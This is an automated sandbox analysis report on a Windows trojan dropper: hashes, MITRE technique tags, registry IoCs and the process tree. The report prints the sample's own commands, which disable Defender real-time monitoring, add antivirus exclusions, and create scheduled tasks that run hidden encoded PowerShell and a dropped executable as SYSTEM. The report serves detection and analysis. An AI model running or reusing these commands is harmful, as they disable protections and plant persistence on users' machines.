1d260f0670b9c7a24763540bbeadf520d7edd342bcbe9d08d2352cade2502720

Analysis

max time kernel
152s
max time network
160s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
23-11-2022 12:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.2MB
MD5

28ceb8d72ff0934b39e779a3b6f1c514
SHA1

c4731a619c179da43cc1f059e8693a88e9891bf4
SHA256

1d260f0670b9c7a24763540bbeadf520d7edd342bcbe9d08d2352cade2502720
SHA512

8966a7163f3af92671631558a3bfb6b353778f008334e0346d594a43cb07b9eb2742f80812a8a54cf863e77a9f755e0577e4a4e0c7d0b0ceb873fdbfe2fb0a1f
SSDEEP

98304:91OFjm0/1juHbR5cyCJUMlcCOAndwmVXUBNECTb3z9Ob0sSmPFSVlCfdD+0Wvad8:91OFjx9jORHCuiUedHRKuNJNdRX0uXgJ

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.execonhost.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LzrOtnkAyuDpOCzW = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gUXCkMfuWzCyC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vCYWhmhlU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yqOJJFIvHNUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\QtEKgGNERTHTknVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yqOJJFIvHNUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LzrOtnkAyuDpOCzW = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gcyASImYjZBU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\QtEKgGNERTHTknVB = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gUXCkMfuWzCyC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LzrOtnkAyuDpOCzW = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LzrOtnkAyuDpOCzW = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gcyASImYjZBU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vCYWhmhlU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Executes dropped EXE 3 IoCs

Processes:

Install.exeInstall.exeZYCkAaP.exe

pid process

1892 Install.exe
1472 Install.exe
1252 ZYCkAaP.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Loads dropped DLL 8 IoCs

Processes:

file.exeInstall.exeInstall.exe

pid process

900 file.exe
1892 Install.exe
1892 Install.exe
1892 Install.exe
1892 Install.exe
1472 Install.exe
1472 Install.exe
1472 Install.exe

pid	process
1892	Install.exe
1472	Install.exe
1252	ZYCkAaP.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

pid	process
900	file.exe
1892	Install.exe
1892	Install.exe
1892	Install.exe
1892	Install.exe
1472	Install.exe
1472	Install.exe
1472	Install.exe

Drops file in System32 directory 8 IoCs

Processes:

powershell.EXEInstall.exepowershell.EXEZYCkAaP.exepowershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	ZYCkAaP.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	ZYCkAaP.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	ZYCkAaP.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\bPisEBnRwoxYOmuHrm.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2008 schtasks.exe
1404 schtasks.exe
2040 schtasks.exe
1948 schtasks.exe
1836 schtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bPisEBnRwoxYOmuHrm.job	schtasks.exe

pid	process
2008	schtasks.exe
1404	schtasks.exe
2040	schtasks.exe
1948	schtasks.exe
1836	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 8 IoCs

Processes:

wscript.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	wscript.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

pid	process
1828	powershell.EXE
1828	powershell.EXE
1828	powershell.EXE
1476	powershell.EXE
1476	powershell.EXE
1476	powershell.EXE
2028	powershell.EXE
2028	powershell.EXE
2028	powershell.EXE
1728	powershell.EXE
1728	powershell.EXE
1728	powershell.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

description	pid	process
Token: SeDebugPrivilege	1828	powershell.EXE
Token: SeDebugPrivilege	1476	powershell.EXE
Token: SeDebugPrivilege	2028	powershell.EXE
Token: SeDebugPrivilege	1728	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exe

description	pid	process	target process
PID 900 wrote to memory of 1892	900	file.exe	Install.exe
PID 900 wrote to memory of 1892	900	file.exe	Install.exe
PID 900 wrote to memory of 1892	900	file.exe	Install.exe
PID 900 wrote to memory of 1892	900	file.exe	Install.exe
PID 900 wrote to memory of 1892	900	file.exe	Install.exe
PID 900 wrote to memory of 1892	900	file.exe	Install.exe
PID 900 wrote to memory of 1892	900	file.exe	Install.exe
PID 1892 wrote to memory of 1472	1892	Install.exe	Install.exe
PID 1892 wrote to memory of 1472	1892	Install.exe	Install.exe
PID 1892 wrote to memory of 1472	1892	Install.exe	Install.exe
PID 1892 wrote to memory of 1472	1892	Install.exe	Install.exe
PID 1892 wrote to memory of 1472	1892	Install.exe	Install.exe
PID 1892 wrote to memory of 1472	1892	Install.exe	Install.exe
PID 1892 wrote to memory of 1472	1892	Install.exe	Install.exe
PID 1472 wrote to memory of 1288	1472	Install.exe	forfiles.exe
PID 1472 wrote to memory of 1288	1472	Install.exe	forfiles.exe
PID 1472 wrote to memory of 1288	1472	Install.exe	forfiles.exe
PID 1472 wrote to memory of 1288	1472	Install.exe	forfiles.exe
PID 1472 wrote to memory of 1288	1472	Install.exe	forfiles.exe
PID 1472 wrote to memory of 1288	1472	Install.exe	forfiles.exe
PID 1472 wrote to memory of 1288	1472	Install.exe	forfiles.exe
PID 1472 wrote to memory of 1392	1472	Install.exe	forfiles.exe
PID 1472 wrote to memory of 1392	1472	Install.exe	forfiles.exe
PID 1472 wrote to memory of 1392	1472	Install.exe	forfiles.exe
PID 1472 wrote to memory of 1392	1472	Install.exe	forfiles.exe
PID 1472 wrote to memory of 1392	1472	Install.exe	forfiles.exe
PID 1472 wrote to memory of 1392	1472	Install.exe	forfiles.exe
PID 1472 wrote to memory of 1392	1472	Install.exe	forfiles.exe
PID 1288 wrote to memory of 316	1288	forfiles.exe	cmd.exe
PID 1288 wrote to memory of 316	1288	forfiles.exe	cmd.exe
PID 1288 wrote to memory of 316	1288	forfiles.exe	cmd.exe
PID 1288 wrote to memory of 316	1288	forfiles.exe	cmd.exe
PID 1288 wrote to memory of 316	1288	forfiles.exe	cmd.exe
PID 1288 wrote to memory of 316	1288	forfiles.exe	cmd.exe
PID 1288 wrote to memory of 316	1288	forfiles.exe	cmd.exe
PID 1392 wrote to memory of 1604	1392	forfiles.exe	cmd.exe
PID 1392 wrote to memory of 1604	1392	forfiles.exe	cmd.exe
PID 1392 wrote to memory of 1604	1392	forfiles.exe	cmd.exe
PID 1392 wrote to memory of 1604	1392	forfiles.exe	cmd.exe
PID 1392 wrote to memory of 1604	1392	forfiles.exe	cmd.exe
PID 1392 wrote to memory of 1604	1392	forfiles.exe	cmd.exe
PID 1392 wrote to memory of 1604	1392	forfiles.exe	cmd.exe
PID 316 wrote to memory of 432	316	cmd.exe	reg.exe
PID 316 wrote to memory of 432	316	cmd.exe	reg.exe
PID 316 wrote to memory of 432	316	cmd.exe	reg.exe
PID 1604 wrote to memory of 1512	1604	cmd.exe	reg.exe
PID 1604 wrote to memory of 1512	1604	cmd.exe	reg.exe
PID 1604 wrote to memory of 1512	1604	cmd.exe	reg.exe
PID 316 wrote to memory of 432	316	cmd.exe	reg.exe
PID 316 wrote to memory of 432	316	cmd.exe	reg.exe
PID 316 wrote to memory of 432	316	cmd.exe	reg.exe
PID 316 wrote to memory of 432	316	cmd.exe	reg.exe
PID 1604 wrote to memory of 1512	1604	cmd.exe	reg.exe
PID 1604 wrote to memory of 1512	1604	cmd.exe	reg.exe
PID 1604 wrote to memory of 1512	1604	cmd.exe	reg.exe
PID 1604 wrote to memory of 1512	1604	cmd.exe	reg.exe
PID 316 wrote to memory of 1420	316	cmd.exe	reg.exe
PID 316 wrote to memory of 1420	316	cmd.exe	reg.exe
PID 316 wrote to memory of 1420	316	cmd.exe	reg.exe
PID 316 wrote to memory of 1420	316	cmd.exe	reg.exe
PID 316 wrote to memory of 1420	316	cmd.exe	reg.exe
PID 316 wrote to memory of 1420	316	cmd.exe	reg.exe
PID 1604 wrote to memory of 360	1604	cmd.exe	reg.exe
PID 316 wrote to memory of 1420	316	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:900

C:\Users\Admin\AppData\Local\Temp\7zS4EDC.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1892

C:\Users\Admin\AppData\Local\Temp\7zS5C15.tmp\Install.exe
.\Install.exe /S /site_id "525403"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1472

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:1288

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:316

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:432

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:1420

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:1392

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1604

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
6⤵
PID:1512

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
6⤵
PID:360

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gRNMUzOii" /SC once /ST 04:44:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:1836

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gRNMUzOii"
4⤵
PID:1864

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gRNMUzOii"
4⤵
PID:1720

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bPisEBnRwoxYOmuHrm" /SC once /ST 13:26:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\ZYCkAaP.exe\" mF /site_id 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2008

C:\Windows\system32\taskeng.exe
taskeng.exe {97DB8F49-8B1A-4628-AA18-63F487A5DF1B} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
1⤵
PID:1936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1828

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1476

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1956

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:544

C:\Windows\system32\taskeng.exe
taskeng.exe {90D23A95-E2DD-48C0-9E2E-057B9315841D} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1292

C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\ZYCkAaP.exe
C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\ZYCkAaP.exe mF /site_id 525403 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1252

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gHcGKCkLh" /SC once /ST 04:12:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1404

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gHcGKCkLh"
3⤵
PID:656

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gHcGKCkLh"
3⤵
PID:1992

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:1852

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1160

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:1904

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:636

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gPgkFNUwR" /SC once /ST 11:57:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:2040

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gPgkFNUwR"
3⤵
PID:1728

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gPgkFNUwR"
3⤵
PID:1184

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1548

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1060

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1880

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1828

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1864

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1592

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1504

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\LzrOtnkAyuDpOCzW" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2024

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\LzrOtnkAyuDpOCzW\nKImzGUY\wKtPmdFzhUaHAywy.wsf"
3⤵
PID:1400

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\LzrOtnkAyuDpOCzW\nKImzGUY\wKtPmdFzhUaHAywy.wsf"
